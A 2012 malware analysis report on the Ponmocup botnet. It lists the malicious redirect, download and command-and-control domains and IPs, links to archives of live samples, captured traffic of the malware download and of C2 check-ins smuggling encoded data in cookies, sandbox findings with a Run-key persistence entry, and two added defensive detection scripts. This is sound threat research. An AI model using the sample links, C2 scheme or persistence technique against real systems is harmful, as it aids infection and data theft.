--------------------------------------------------------------------------------
analysis done by @c_APT_ure

this is a new analysis from 2012-11-10, but not very much different from my previous one here:
http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-10-05/analysis.txt
--------------------------------------------------------------------------------

screenshots of malware infection and analysis:
http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-11-10/Screenshots.zip

malware samples, PCAP, registry extract:
http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-11-10/Samples.zip
http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-11-10/Registry.zip
http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-11-10/wireshark-pcap.zip
http://security-research.dyndns.org/pub/botnet/ponmocup/analysis_2012-11-10/Paros.zip

blog posts about Ponmocup malware on my blog:
http://c-apt-ure.blogspot.com/search/label/ponmocup

*** this is a quick analysis report ***

----------------------------------------------------------------------------------------------------
overview network analysis:

* redirect domain:   toktosun.mobilephoneguy.com   178.211.33.205
* malware download:  uy.mitiangis-nagios.com       82.211.45.82
* C2 / phone home:   intohave.com                  64.179.44.188  (DNS request only)
                     88.216.164.117
* URL sample #1: http://88.216.164.117/entries                   (2 x requests with data in cookie values)
* URL sample #2: http://88.216.164.117/videos/forumdisplay.php   (2 x requests with data in cookie values)

----------------------------------------------------------------------------------------------------
DNS lookups:

toktosun.mobilephoneguy.com   178.211.33.205
uy.mitiangis-nagios.com       82.211.45.82
intohave.com                  64.179.44.188

----------------------------------------------------------------------------------------------------
malware infector download:

GET / HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.google.ch/search?hl=de-CH&source=hp&q=bosa+mariina+hotel&gbv=2&oq=bosa+mariina+hotel&gs_l=heirloom-hp.3..0i13j0i13i30l9.103204.107047.0.110797.18.18.0.0.0.0.343.3107.0j4j8j2.14.0...0.0...1c.1.epm6J4YXrbs
Accept-Language: de-ch
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: uy.mitiangis-nagios.com

HTTP/1.1 200 OK
Server: nginx/1.1.17
Date: Sat, 10 Nov 2012 21:12:24 GMT
Content-Type: application/octet-stream
Content-Length: 573440
Last-Modified: Sat, 10 Nov 2012 20:15:03 GMT
Connection: close
Set-Cookie: PHPSESSID=lrngipi1hcggim5nn6un3mjs15; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: post-check=0, pre-check=0
Accept-Ranges: none
Content-Disposition: attachment; filename="goog1e_hotel_mariina.exe"

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

----------------------------------------------------------------------------------------------------
C2 checkin (1)

GET /entries HTTP/1.1
Accept: */*
Cookie: IMGURSESSION=Vzxt4Ms9VJVfbICIT6FNwjg8vbRZ8dEkx-FI8Kc79AklA2OxflrAymNBgMfKKRYsIIVzVToEvbJhNac0s7wpIQMH28qejqcUIsF5yLmBicosJODmavw06Zz-yVg4s4OWUZd_Levimi0oexrCsjSselSK6JL; core=hIcWCJWOUU9_wNa_YzcrbEM2bP5FXuXGJwkXN8dSRGpZFZQ1wlqlABVOMHlV_cLiZAL8E_DMjWOk4mQaENoRyNmgoCmpI-K629n9IPOK9Ve_onza55d2dYqYiOOZf9dFFV1Yf; WC_PERSISTENT=cswiRe1odR2xh4JHbUXrqQO5t04ohQUd1HHa-2o9ZOr49aEuGW8U8ESHBHZrHXqxTqB13PWoZHAOChjS6P2PyhHjU0DZVlsipWxE6QMebanpZiZ6mlAPoaf5r2tV-BCzwxoCuiVH7O_-ngQ-MMFpnG49iiaedPzmff52dQml7GctV_luheZ4vhtFBXdvyA9HrFudJenfFQKnXJLW; freq=RHPzrTDFd9KyGoGWSR-8pdMKpPWjeaSqt1VuO9h00tek5rH9fWikSU9mAKmvGMz2UzCS69BgxeBYheQYBETN_gvbIyeC26AYLulcLTWZ-UFQRj8MupWYsLUq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 88.216.164.117
Connection: Close
Cache-Control: no-cache
Pragma: no-cache

HTTP/1.1 404 Not Found
Server: Apache/1.3.42
Date: Sat, 10 Nov 2012 21:19:03 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 205
Connection: close

404 Not Found
Not Found
The requested URL /entries was not found on this server.

----------------------------------------------------------------------------------------------------
C2 checkin (2)

GET /entries HTTP/1.1
Accept: */*
Cookie: IMGURSESSION=uU_LFgZNgOcjmR4NbGp5mHnkPXd7pl8xIZMMr5qPSUSHfSqMlbcNZu7bRdVhwPZitCOmN08JOgES4mLrafNo8qU7aoVN3UDzJ_LQjS6uXuwlcRBtmCMEBgUlBy7gqKJhV3zPd1o-oR8RZx4qISwNEf1GaktwZHB_JZ8nGQ0xvJ9A7f4pZlO1ikql8OHO73TiUfdaT8dQOVvqfmX0WmJDzpBa62HaXML7; core=SIrIktXf0JOX-zKOq2W0hPpvGPJ41s8lNCZldD8vTF3whtnVhaBdzbJN5DHQxB_FqrxOCd997IJQxEpcXZSV5N86PGolTbdmQFdOiquuxBV6bZ0V3jo6mLEcz4CDFnHn7FdE4hCUYGYObKKHWdfw8zrdqa; WC_PERSISTENT=NLGEEcjQMwgi59n6TPcDuaDG3JB8vOtTgSgtwusfCQZ0ALhsBrPQ5kDtz8N6yGnuJpjaVh7mw1bFGl5rrdJ5xXedg9ig9C1zqCUUvm-kt3UZeYSPY8tpTv7ITa7RqMi18HopOyZwlMksfn_sP8FjRcekCD7Q4XQkDhDJwwWOpjyvvbQpILL1WDqqufBwjAkdOvWj0gycyCPksnQtf2BCurC7Bvr6a6ypth8ou2UhD6J5hWLkk6BRx5cbtXKfegI4ffrx7GF2V8PmQBAOc61IMGSTdwBphJNN8PuYUZSiWBVRk5Tjs1f_uijbHVO8MtijlJy0MnLDbOAbfCzX7uFsSpkxElEVCkrTtt6QL0jZx9FZ68BlCwYi56TWWgDbpZSJFMWKCLQXit7ZTxmgHWjpVQfMmAx3QmeNkkyjwNuzMDcUOKwtO8rppGQw_Ac0XGjNrsYCNJ6Uvt9SWPK4hy8Z7fTOVEcYhfjapiWu_s0arV6GY9dWphIFPI9TBFLx; freq=-vTmxk-WRXyRO7v7GRUDxK3_WzUvfZg2nCwA6
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 88.216.164.117
Connection: Close
Cache-Control: no-cache
Pragma: no-cache

HTTP/1.1 404 Not Found
Server: Apache/1.3.42
Date: Sat, 10 Nov 2012 21:19:07 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 205
Connection: close

404 Not Found
Not Found
The requested URL /entries was not found on this server.

----------------------------------------------------------------------------------------------------
comparing cookie values from 2 checkin requests:

Cookie: IMGURSESSION=Vzxt4Ms9VJVfbICIT6FNwjg8vbRZ8dEkx-FI8Kc79AklA2OxflrAymNBgMfKKRYsIIVzVToEvbJhNac0s7wpIQMH28qejqcUIsF5yLmBicosJODmavw06Zz-yVg4s4OWUZd_Levimi0oexrCsjSselSK6JL; core=hIcWCJWOUU9_wNa_YzcrbEM2bP5FXuXGJwkXN8dSRGpZFZQ1wlqlABVOMHlV_cLiZAL8E_DMjWOk4mQaENoRyNmgoCmpI-K629n9IPOK9Ve_onza55d2dYqYiOOZf9dFFV1Yf; WC_PERSISTENT=cswiRe1odR2xh4JHbUXrqQO5t04ohQUd1HHa-2o9ZOr49aEuGW8U8ESHBHZrHXqxTqB13PWoZHAOChjS6P2PyhHjU0DZVlsipWxE6QMebanpZiZ6mlAPoaf5r2tV-BCzwxoCuiVH7O_-ngQ-MMFpnG49iiaedPzmff52dQml7GctV_luheZ4vhtFBXdvyA9HrFudJenfFQKnXJLW; freq=RHPzrTDFd9KyGoGWSR-8pdMKpPWjeaSqt1VuO9h00tek5rH9fWikSU9mAKmvGMz2UzCS69BgxeBYheQYBETN_gvbIyeC26AYLulcLTWZ-UFQRj8MupWYsLUq

Cookie: IMGURSESSION=uU_LFgZNgOcjmR4NbGp5mHnkPXd7pl8xIZMMr5qPSUSHfSqMlbcNZu7bRdVhwPZitCOmN08JOgES4mLrafNo8qU7aoVN3UDzJ_LQjS6uXuwlcRBtmCMEBgUlBy7gqKJhV3zPd1o-oR8RZx4qISwNEf1GaktwZHB_JZ8nGQ0xvJ9A7f4pZlO1ikql8OHO73TiUfdaT8dQOVvqfmX0WmJDzpBa62HaXML7; core=SIrIktXf0JOX-zKOq2W0hPpvGPJ41s8lNCZldD8vTF3whtnVhaBdzbJN5DHQxB_FqrxOCd997IJQxEpcXZSV5N86PGolTbdmQFdOiquuxBV6bZ0V3jo6mLEcz4CDFnHn7FdE4hCUYGYObKKHWdfw8zrdqa; WC_PERSISTENT=NLGEEcjQMwgi59n6TPcDuaDG3JB8vOtTgSgtwusfCQZ0ALhsBrPQ5kDtz8N6yGnuJpjaVh7mw1bFGl5rrdJ5xXedg9ig9C1zqCUUvm-kt3UZeYSPY8tpTv7ITa7RqMi18HopOyZwlMksfn_sP8FjRcekCD7Q4XQkDhDJwwWOpjyvvbQpILL1WDqqufBwjAkdOvWj0gycyCPksnQtf2BCurC7Bvr6a6ypth8ou2UhD6J5hWLkk6BRx5cbtXKfegI4ffrx7GF2V8PmQBAOc61IMGSTdwBphJNN8PuYUZSiWBVRk5Tjs1f_uijbHVO8MtijlJy0MnLDbOAbfCzX7uFsSpkxElEVCkrTtt6QL0jZx9FZ68BlCwYi56TWWgDbpZSJFMWKCLQXit7ZTxmgHWjpVQfMmAx3QmeNkkyjwNuzMDcUOKwtO8rppGQw_Ac0XGjNrsYCNJ6Uvt9SWPK4hy8Z7fTOVEcYhfjapiWu_s0arV6GY9dWphIFPI9TBFLx; freq=-vTmxk-WRXyRO7v7GRUDxK3_WzUvfZg2nCwA6

----------------------------------------------------------------------------------------------------
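The two check-in requests above carry their data in four cookies whose values are long, base64url-looking and different on every request, sent to a bare-IP Host that answers 404. The following triage script is an added example (not part of the original report) that turns those observations into a proxy-log check: it parses a raw request, measures each cookie value's length and Shannon entropy, and flags opaque cookies combined with a bare-IP Host or an unusually large cookie payload. The C2 request is the first check-in copied from the capture; the "benign" request, its hostname www.example.com and the lang cookie are constructed for comparison (only its PHPSESSID value comes from the capture).

```python
import math
import re

# C2 check-in (1) from the capture above; cookie values copied verbatim.
C2_CHECKIN = """GET /entries HTTP/1.1
Accept: */*
Cookie: IMGURSESSION=Vzxt4Ms9VJVfbICIT6FNwjg8vbRZ8dEkx-FI8Kc79AklA2OxflrAymNBgMfKKRYsIIVzVToEvbJhNac0s7wpIQMH28qejqcUIsF5yLmBicosJODmavw06Zz-yVg4s4OWUZd_Levimi0oexrCsjSselSK6JL; core=hIcWCJWOUU9_wNa_YzcrbEM2bP5FXuXGJwkXN8dSRGpZFZQ1wlqlABVOMHlV_cLiZAL8E_DMjWOk4mQaENoRyNmgoCmpI-K629n9IPOK9Ve_onza55d2dYqYiOOZf9dFFV1Yf; WC_PERSISTENT=cswiRe1odR2xh4JHbUXrqQO5t04ohQUd1HHa-2o9ZOr49aEuGW8U8ESHBHZrHXqxTqB13PWoZHAOChjS6P2PyhHjU0DZVlsipWxE6QMebanpZiZ6mlAPoaf5r2tV-BCzwxoCuiVH7O_-ngQ-MMFpnG49iiaedPzmff52dQml7GctV_luheZ4vhtFBXdvyA9HrFudJenfFQKnXJLW; freq=RHPzrTDFd9KyGoGWSR-8pdMKpPWjeaSqt1VuO9h00tek5rH9fWikSU9mAKmvGMz2UzCS69BgxeBYheQYBETN_gvbIyeC26AYLulcLTWZ-UFQRj8MupWYsLUq
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 88.216.164.117
Connection: Close
Cache-Control: no-cache
Pragma: no-cache
"""

# Constructed benign request for comparison: host and "lang" cookie are made up,
# the PHPSESSID value is the one set by the download server in the capture.
BENIGN = """GET /index.php HTTP/1.1
Accept: */*
Cookie: PHPSESSID=lrngipi1hcggim5nn6un3mjs15; lang=de-ch
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.example.com
Connection: Keep-Alive
"""

OPAQUE_CHARSET = re.compile(r"^[A-Za-z0-9_-]+$")           # base64url-style alphabet
BARE_IP = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")  # Host header is a raw IPv4


def parse_request(raw):
    """Split a raw HTTP request into (method, path, {lowercased header: value})."""
    lines = raw.strip("\r\n").split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break                      # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def parse_cookies(header):
    """Turn 'a=1; b=2' into an ordered dict; a value may itself contain '='."""
    cookies = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            cookies[name] = value
    return cookies


def shannon_entropy(s):
    """Bits per character; random base64url text sits well above 4, words well below."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def opaque_cookies(cookies, min_len=64, min_entropy=4.0):
    """Names of cookies whose value looks like an encoded blob rather than a session id."""
    return [name for name, value in cookies.items()
            if len(value) >= min_len
            and OPAQUE_CHARSET.match(value)
            and shannon_entropy(value) >= min_entropy]


def score_request(raw):
    """Combine the cookie heuristic with the destination to produce a triage verdict."""
    _method, path, headers = parse_request(raw)
    cookies = parse_cookies(headers.get("cookie", ""))
    opaque = opaque_cookies(cookies)
    host = headers.get("host", "")
    bare_ip = bool(BARE_IP.match(host))
    cookie_bytes = sum(len(v) for v in cookies.values())
    return {
        "host": host,
        "path": path,
        "opaque_cookies": opaque,
        "cookie_bytes": cookie_bytes,
        "bare_ip_host": bare_ip,
        # opaque blobs alone are common (JWTs, tracking ids); require a second signal
        "suspicious": bool(opaque) and (bare_ip or cookie_bytes >= 256),
    }


if __name__ == "__main__":
    for label, raw in (("c2 checkin", C2_CHECKIN), ("benign", BENIGN)):
        print(label, score_request(raw))
```

The entropy and length thresholds are deliberately loose; on their own they would also flag legitimate tokens, which is why the verdict needs the bare-IP destination or an oversized cookie payload as well. A further signal visible in the capture but not coded here is that all four values change completely between the two requests to the same URL, whereas a real session cookie stays constant.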
https://www.virustotal.com/file/a8630ced1c314487ce814c4cf8ca0f0cf9e614c3f12b8e2363fdf7a9d5be475e/analysis/1352590563/

SHA256: a8630ced1c314487ce814c4cf8ca0f0cf9e614c3f12b8e2363fdf7a9d5be475e
SHA1:   35a34ea218f8368928ddfd012d5c166eadc2f3f3
MD5:    636a985d6e14c27ffc4fe6393ec96208
File size: 560.0 KB ( 573440 bytes )
File name: goog1e_hotel_mariina.exe
File type: Win32 EXE
Detection ratio: 2 / 44
Analysis date: 2012-11-10 23:36:03 UTC ( 0 minutes ago )

Kaspersky   Trojan.Win32.Pirminay.ste   20121110
Kingsoft    Win32.Troj.Undef.(kcloud)   20121105

ssdeep
12288:gLrDFHF0V/8LPHU82ceqoCNR7VVOG2lRxI3eyfoy/IAfPe:ArDFl8s/KctoM76CeCFQI

PEiD packer identifier
Armadillo v1.71

ExifTool
MIMEType.................: application/octet-stream
Subsystem................: Windows GUI
MachineType..............: Intel 386 or later, and compatibles
TimeStamp................: 2007:04:26 06:23:13+01:00
FileType.................: Win32 EXE
PEType...................: PE32
CodeSize.................: 32768
LinkerVersion............: 6.0
EntryPoint...............: 0x8d5a
InitializedDataSize......: 536576
SubsystemVersion.........: 4.0
ImageVersion.............: 0.0
OSVersion................: 4.0
UninitializedDataSize....: 0

Portable Executable structural information
Compilation timedatestamp.....: 2007-04-26 05:23:13
Target machine................: 0x14C (Intel 386 or later processors and compatible processors)
Entry point address...........: 0x00008D5A

PE Sections...................:
Name     Virtual Address   Virtual Size   Raw Size   Entropy   MD5
.text    4096              32600          32768      6.28      ec3b98a7ed8ca80229d6c44bfdf87484
.rdata   36864             1298           4096       2.01      ba6582a172f3e0f495d5ca60f2b25ced
.data    40960             532336         532480     5.24      a46b2d7619d45c8995dcd3498cbd8236

----------------------------------------------------------------------------------------------------
http://malwr.com/analysis/636a985d6e14c27ffc4fe6393ec96208/

Analysis Errors
[2012-11-10 15:54:25,359] [Core.DumpFiles] ERROR: Something went wrong while dumping file from "C:\WINDOWS\system32\sortt.exe" to "C:\cuckoo\files": [Errno 13] Permission denied: 'C:\\WINDOWS\\system32\\sortt.exe'.

Network Analysis

DNS Requests
Hostname       IP Address
intohave.com   64.179.44.188

HTTP Requests

URL:  http://88.216.164.117/videos/forumdisplay.php
Data:
GET /videos/forumdisplay.php HTTP/1.1
Accept: */*
Cookie: uid=referringpath=IhAvTmZ-yvFGlSxXRC179j39Ni0tsj6JfNxjGZl1IllTPrUVXVvEvu987; clogid=RqVgmLTnjH_rnFB26jUzhfZXbvMXpojJ6VoNwrI0lDYMza9InEmDPY8POeeZly0Hu9CMTU6pIg1uSGylOU33SuPPtUgGAYVxxcSAYGSEE--4Ww; ARSiteUser=server=lhupDdo3B71hgn; _thepoint=7P495GKsqOfLB7idB6D0kuugTc0dyzrYzfb9ahdm36_poGCdA7nKdyASoHiHccsC6JvsNV29bvcQ1LtASMyCjGC901DwY77m_6DTbyP73r5vpcCrwKY3gUMnnHFLSFGc8aYtpWOK3ioCOXbqm5byQCLqq-q7hzRQjrPhkeR4QpzxAwxO9NFixvZn1KcrAbLRwmwhJxVKu-Y_Ipg1XR1bMikYZxqMj1IQDncUzSykhUSfKx0910RtdJ1pnS6EdR06pWolZJcYGBziS89c6qoTZPFpjDdbeWSDTL3FXASnXLPj7qTc6jNqAjf4yLUBN_Z9mKyx7IFDNCeo38GkBrBdqyMjEnOJqtOIBS8541Uo61do2K79_1DkJz1DdeFD7ovEKU7KJLneCaOD3RJN4W4ZCkFkmvqgTKD-9lrqEFSWnmSiO7G8USZczCE
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: 88.216.164.117
Connection: Close
Cache-Control: no-cache
Pragma: no-cache

URL:  http://88.216.164.117/videos/forumdisplay.php
Data:
GET /videos/forumdisplay.php HTTP/1.1
Accept: */*
Cookie: uid=referringpath=rCUpe6z5bLIRfJzl_XuLHdIIi82YQWt1oRRHkn; clogid=WJaldcdGtA894ytGREoZ47y8RFOBCSV8-_lcNmoLieJO4TP9PElI0Mu8Ul7P0GMULgia1UD-TxQaXh4SwH5L9Er-G-C0miMpiNkyC0r7x4fZwPtKQVSubNoZtixKgGPihcAa; ARSiteUser=server=wxasYGLfETKNIgSHXiUFxAP_I76nL; _thepoint=3q0ij9DsxT943zLpOFg3TNCxwrBsfPFmiFVpZW7SqS9ZTcgNutvXTbBTxKeyuq3oapo6zvV2gBcZHKfOkclh4xi8TJos-NouQ_yIkRDM14jMBIfPU1sV5qkuntjPK_NAfUAxp_myaJM895el0S2PAfArW0DaBDy3PLlZY7_z9tfN874Tu-q2hjB3MPhEE2Vyza5uCiXbzbaoaE0PMUIFOSa7Bm5LsW1X-V45cgzMdUDlAILfmbK8A27ociTaTBrz8M-AX8GlxNs1tb78pgX5Z6WV-U61xvRuYca4buCs0SYcHGcYHS9FvYWHfvzSm_CjjFFVfL0SKy3Xmvx-3Hs8PnHUGr-Mp0X3l0ePtoLdPT9-vwDuVEJJk4ZaH_2Zi-fBm8rLa7ZGtA3eyGHMB_GHFIqALbOvq5U-MOOvoziZbzoIK1lI-Gk2-BX1sUPT1k2LvpU2L9avj6zd0trMHLzwZazCg1gnGbSaEA9qQWl7MYcSbsDNq9iULi3J9X5pjSfeX4_I2gOmW8Lv4pdD53lY865P1rnRwU2k6IvzO6bzcPgKiVPv4fmHIa6hobkL0YD1U8tVgFDg_-p5CC1UlPvpCNybKUKY9Ae2Obd-1jcMs5ogSIfSuB1aa95rNisOBgXQ3EegOXQaU4G8sHEtIjTufOiu1noHX7QBslH-aEP41nnBYrZUmz4z7AhrXrs54yFUswhujjlGZY82mf6CWg3FcsUnMRp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: 88.216.164.117
Connection: Close
Cache-Control: no-cache
Pragma: no-cache

----------------------------------------------------------------------------------------------------
http://www.threatexpert.com/report.aspx?md5=636a985d6e14c27ffc4fe6393ec96208

Submission details:
Submission received: 10 November 2012, 18:01:32
Processing time: 6 min 14 sec

Submitted sample:
File MD5:   0x636A985D6E14C27FFC4FE6393EC96208
File SHA-1: 0x35A34EA218F8368928DDFD012D5C166EADC2F3F3
Filesize:   573,440 bytes

Summary of the findings:
What's been found                       Severity Level
Creates a startup registry entry.
Registry Modifications

The following Registry Keys were created:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
HKEY_LOCAL_MACHINE\SOFTWARE\qrjaslop
HKEY_CURRENT_USER\Software\qrjaslop

The newly created Registry Values are:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
6 = 5A 0E 6C A2 13 1D 0A A7 E8 8F

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
LMITAPUUEQ = "%System%\upnpcontc.exe"
so that %System%\upnpcontc.exe runs every time Windows starts

[HKEY_LOCAL_MACHINE\SOFTWARE\qrjaslop]
URF = 4B F0 35 02 C5 B6 29 9A BF B5 7B FD CD FA E7 F5 75 8E 33 0C 16 14 1B 33 62 77 61 98 FE 64 0D 49 6C AF 06 89 99 F5 37 F0 66 99 A6 48 86 34 1C EA A6 76 40 71 A4 15 3B EC 23 6E 27 BB E4 D3 3C 93 A9 2C 08 30 80 85 73 A1 63 80 D3 29 FF B4 C4 07 5F 60 E7 C

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
6 = 5A 0E 6C A2 13 1D 0A A7 E8 8F

[HKEY_CURRENT_USER\Software\qrjaslop]
URF = 4B F0 35 02 C5 B6 29 9A BF B5 7B FD CD FA E7 F5 75 8E 33 0C 16 14 1B 33 62 77 61 98 FE 64 0D 49 6C AF 06 89 99 F5 37 F0 66 99 A6 48 86 34 1C EA A6 76 40 71 A4 15 3B EC 23 6E 27 BB E4 D3 3C 93 A9 2C 08 30 80 85 73 A1 63 80 D3 29 FF B4 C4 07 5F 60 E7 C

Other details

To mark the presence in the system, the following Mutex object was created:
WBEMPROVIDERSTATICMUTEX

The following Host Names were requested from a host database:
192.5.5.241
intohave.com

----------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------
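The persistence entry above sits under policies\Explorer\Run, an autostart location Explorer honours alongside the usual CurrentVersion\Run keys but one that legitimate software seldom populates. The script below is an added example (not part of the original report or the ThreatExpert output) that scans an exported .reg file for values under those Run keys, unescapes the image path and marks the policy-key entries separately. The sample export is constructed: the LMITAPUUEQ and URF values mirror the ThreatExpert findings, the VMware entry is made up as a normal-looking control, and the hex data for URF is truncated.

```python
import re

# Constructed .reg export modelled on the ThreatExpert findings above.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"LMITAPUUEQ"="%System%\\upnpcontc.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VMware Tools"="\"C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe\""

[HKEY_LOCAL_MACHINE\SOFTWARE\qrjaslop]
"URF"=hex:4b,f0,35,02,c5,b6,29,9a,bf,b5
'''

# Autostart (ASEP) key suffixes, matched case-insensitively so that HKLM, HKCU
# and Wow6432Node variants are all covered.
ASEP_SUFFIXES = (
    r"\microsoft\windows\currentversion\run",
    r"\microsoft\windows\currentversion\runonce",
    r"\microsoft\windows\currentversion\policies\explorer\run",
)
POLICY_RUN_SUFFIX = r"\policies\explorer\run"

SECTION_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def unescape(s):
    """Undo .reg string escaping: \\ -> \ and \" -> " ."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Yield (key, value_name, data) for every value in a .reg export.

    String data is returned unescaped; other types (hex:, dword:) are returned raw."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        m = SECTION_RE.match(line)
        if m:
            key = m.group(1)
            continue
        m = VALUE_RE.match(line)
        if m and key is not None:
            name, data = unescape(m.group(1)), m.group(2)
            if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
                data = unescape(data[1:-1])
            yield key, name, data


def image_path(command):
    """Extract the executable from a Run value: quoted path or first token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def find_autoruns(text):
    """Return Run-key entries; policy_run marks the rarely used policies\Explorer\Run key."""
    hits = []
    for key, name, data in parse_reg(text):
        key_l = key.lower()
        if not any(key_l.endswith(suffix) for suffix in ASEP_SUFFIXES):
            continue
        hits.append({
            "key": key,
            "name": name,
            "image": image_path(data),
            "policy_run": key_l.endswith(POLICY_RUN_SUFFIX),
        })
    return hits


if __name__ == "__main__":
    for hit in find_autoruns(SAMPLE_REG):
        flag = "POLICY-RUN" if hit["policy_run"] else "run"
        print(f"[{flag}] {hit['name']} -> {hit['image']}  ({hit['key']})")
```

Run against the Registry.zip extract or any other .reg export, the output gives a short list of autostart image paths to verify against the file system and a signer; a value under policies\Explorer\Run pointing at a randomly named executable in %System%, as here, is the entry to look at first.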